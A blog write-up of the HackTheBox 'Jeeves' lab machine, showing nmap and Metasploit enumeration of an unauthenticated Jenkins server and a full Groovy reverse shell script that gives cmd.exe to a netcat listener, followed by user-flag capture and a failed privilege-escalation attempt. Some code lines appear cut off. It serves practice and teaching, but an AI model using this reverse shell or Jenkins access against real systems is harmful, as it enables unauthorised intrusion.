Jeeves – HacktheBox

After getting the email that Jeeves will be retiring soon I thought I’d give it a go. This is the first Windows box that I’ve done in quite a while. Lets get into it


A quick nmap scan to see what ports are open. The -F tag is Fast mode – Scan fewer ports than the default scan.

[root:~/Desktop/jeeves]# nmap -F
Starting Nmap 7.70SVN ( ) at 2018-05-17 10:09 BST
Nmap scan report for
Host is up, received echo-reply ttl 127 (0.029s latency).
Not shown: 97 filtered ports
Reason: 97 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127

Nmap done: 1 IP address (1 host up) scanned in 2.16 seconds

Looks like a webserver is available and remote desktop. While i do a full port scan I’ll load up Firefox and take a look at the website.

When I use the search it brings be to a page with an error – it looks like it is displaying a picture rather than html or other code

The full port scan completed

Nmap scan report for 
Host is up, received echo-reply ttl 127 (0.035s latency).
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE 
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: 
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s
| smb-security-mode:
| account_used: guest 
| authentication_level: user 
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2018-05-09 02:02:11
|_ start_date: 2018-05-07 03:07:55

Port 50000 has a Jetty Server running. A quick Google reveals “Eclipse Jetty provides a Web server and javax.servlet container, plus support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. These components are open source and available for commercial use and distribution.”

Checking to see what is on that webserver. Followed by a dirbuster on port 50000.

I browsed to the askjeeves directory and got what looks like a CMS called Jenkins.

A quick Google and it looks like Jenkins is a self-contained Java-based program, ready to run out-of-the-box, with packages for Windows, Mac OS X and other Unix-like operating systems.

I fired up Metasploit to see if it had a Jenkins module and sure enough it did have a few. I tried out one.

msf post(multi/gather/jenkins_gather) > use auxiliary/scanner/http/jenkins_enum
msf auxiliary(scanner/http/jenkins_enum) > show options

Module options (auxiliary/scanner/http/jenkins_enum):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
 RHOSTS yes The target address range or CIDR identifier
 RPORT 50000 yes The target port (TCP)
 SSL false no Negotiate SSL/TLS for outgoing connections
 TARGETURI /askjeeves/ yes The path to the Jenkins-CI application
 THREADS 1 yes The number of concurrent threads
 VHOST no HTTP server virtual host

msf auxiliary(scanner/http/jenkins_enum) > run

[+] [2018.05.17-11:02:57] - Jenkins Version 2.87
[+] [2018.05.17-11:02:57] - /askjeeves/script does not require authentication (200)
[+] [2018.05.17-11:02:57] - /askjeeves/view/All/newJob does not require authentication (200)
[+] [2018.05.17-11:02:57] - /askjeeves/asynchPeople/ does not require authentication (200)
[+] [2018.05.17-11:02:57] - /askjeeves/systemInfo does not require authentication (200)
[*] [2018.05.17-11:02:57] Getting useful information from systemInfo
 OS: Windows 10
 OS Version: 10.0
 Arch: x86
 User: kohsuke
 Domain: JEEVES
 Home Directory: C:\Users\kohsuke
 Language: en
 Country: US
 Timezone: America/New_York
 Computer Name: JEEVES
 System Drive: C:
 Temp Directory: C:\Users\kohsuke\AppData\Local\Temp
 Temp Directory: C:\Users\kohsuke\AppData\Local\Temp

[*] [2018.05.17-11:02:58] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/jenkins_enum) > 

So it is a Windows 10 box with a user kohsuke and the Jenkins application is v 2.87.

I browsed through the CMS and found a way to execute commands through a jar file I had to download

Looks like it worked

[root:~/Desktop/jeeves]# java -jar jenkins-cli.jar -s who-am-i (master✱) 
Authenticated as: anonymous

Now what can I run? Noting useful by the looks of it

Available Commands

add-job-to-view Adds jobs to view.
build Builds a job, and optionally waits until its completion.
cancel-quiet-down Cancel the effect of the “quiet-down” command.
clear-queue Clears the build queue.
connect-node Reconnect to a node(s)
console Retrieves console output of a build.
copy-job Copies a job.
create-credentials-by-xml Create Credential by XML
create-credentials-domain-by-xml Create Credentials Domain by XML
create-job Creates a new job by reading stdin as a configuration XML file.
create-node Creates a new node by reading stdin as a XML configuration.
create-view Creates a new view by reading stdin as a XML configuration.
declarative-linter Validate a Jenkinsfile containing a Declarative Pipeline
delete-builds Deletes build record(s).
delete-credentials Delete a Credential
delete-credentials-domain Delete a Credentials Domain
delete-job Deletes job(s).
delete-node Deletes node(s)
delete-view Deletes view(s).
disable-job Disables a job.
disconnect-node Disconnects from a node.
enable-job Enables a job.
get-credentials-as-xml Get a Credentials as XML (secrets redacted)
get-credentials-domain-as-xml Get a Credentials Domain as XML
get-gradle List available gradle installations
get-job Dumps the job definition XML to stdout.
get-node Dumps the node definition XML to stdout.
get-view Dumps the view definition XML to stdout.
groovy Executes the specified Groovy script.
groovysh Runs an interactive groovy shell.
help Lists all the available commands or a detailed description of single command.
install-plugin Installs a plugin either from a file, an URL, or from update center.
install-tool Performs automatic tool installation, and print its location to stdout. Can be only called from inside a build. [deprecated]
keep-build Mark the build to keep the build forever.
list-changes Dumps the changelog for the specified build(s).
list-credentials Lists the Credentials in a specific Store
list-credentials-context-resolvers List Credentials Context Resolvers
list-credentials-providers List Credentials Providers
list-jobs Lists all jobs in a specific view or item group.
list-plugins Outputs a list of installed plugins.
login Saves the current credentials to allow future commands to run without explicit credential information. [deprecated]
logout Deletes the credentials stored with the login command. [deprecated]
mail Reads stdin and sends that out as an e-mail.
offline-node Stop using a node for performing builds temporarily, until the next “online-node” command.
online-node Resume using a node for performing builds, to cancel out the earlier “offline-node” command.
quiet-down Quiet down Jenkins, in preparation for a restart. Don’t start any builds.
reload-configuration Discard all the loaded data in memory and reload everything from file system. Useful when you modified config files directly on disk.
reload-job Reload job(s)
remove-job-from-view Removes jobs from view.
replay-pipeline Replay a Pipeline build with edited script taken from standard input
restart Restart Jenkins.
safe-restart Safely restart Jenkins.
safe-shutdown Puts Jenkins into the quiet mode, wait for existing builds to be completed, and then shut down Jenkins.
session-id Outputs the session ID, which changes every time Jenkins restarts.
set-build-description Sets the description of a build.
set-build-display-name Sets the displayName of a build.
set-build-parameter Update/set the build parameter of the current build in progress. [deprecated]
set-build-result Sets the result of the current build. Works only if invoked from within a build. [deprecated]
shutdown Immediately shuts down Jenkins server.
update-credentials-by-xml Update Credentials by XML
update-credentials-domain-by-xml Update Credentials Domain by XML
update-job Updates the job definition XML from stdin. The opposite of the get-job command.
update-node Updates the node definition XML from stdin. The opposite of the get-node command.
update-view Updates the view definition XML from stdin. The opposite of the get-view command.
version Outputs the current version.
wait-node-offline Wait for a node to become offline.
wait-node-online Wait for a node to become online.
who-am-i Reports your credential and permissions.

I need to upload a reverse shell and run it.

I found this page and a Groovy reverse shell script on I modified the ip and port and started a netcat listener.

String host="";
int port=55555;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();


[root:~/Desktop/jeeves]# nc -nlvp 55555 (master✱) 
listening on [any] 55555 ...
connect to [] from (UNKNOWN) [] 49680
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.


Time to capture the user flag

 Volume in drive C has no label. 
 Volume Serial Number is BE50-B1C9 
 Directory of C:\Users\kohsuke\Desktop 
11/03/2017 11:19 PM <DIR> . 
11/03/2017 11:19 PM <DIR> .. 
11/03/2017 11:22 PM 32 user.txt 
 1 File(s) 32 bytes 
 2 Dir(s) 7,165,026,304 bytes free 
C:\Users\kohsuke\Desktop>type user.txt 
type user.txt 

Now for priv esc. Lets see what OS version is running and look for exploits.


Host Name: JEEVES
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.10586 N/A Build 10586
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-20304-47406-AA297
Original Install Date: 10/25/2017, 4:45:33 PM
System Boot Time: 5/16/2018, 2:50:22 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC

“Researchers Discovered this Exploit in Microsoft Windows 10 Redstone 1 (August 2016) and specifically Target Microsoft Windows 10 x64 Version 1511 and The build number is Microsoft Windows 10.0.10586.”

So I’ve learned that Windows 10 is also vulnerable to Eternal Blue. I tried finding the Windows 10 exploit but couldn’t and the Windows 7 one doesn’t work ( i tried it).

After poking about the server i found a keypass file.

 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

Directory of C:\Users\kohsuke\Documents

11/03/2017 11:18 PM <DIR> .
11/03/2017 11:18 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
 1 File(s) 2,846 bytes
 2 Dir(s) 7,032,320,000 bytes free

I could not get it downloaded to my machine. If it was on a Linux but it would be a lot easier but a netcat connection on a Windows box made it impossible ( for me ).


I didn’t learn much on this box other than to search for files in DOS.

dir fileyouwant.whatever /s /p

Disappointed that I was unable to figure out how to transfer the file to my box. Please add a comment on how you would have done it.




Leave a Reply

Your email address will not be published. Required fields are marked *

Post comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.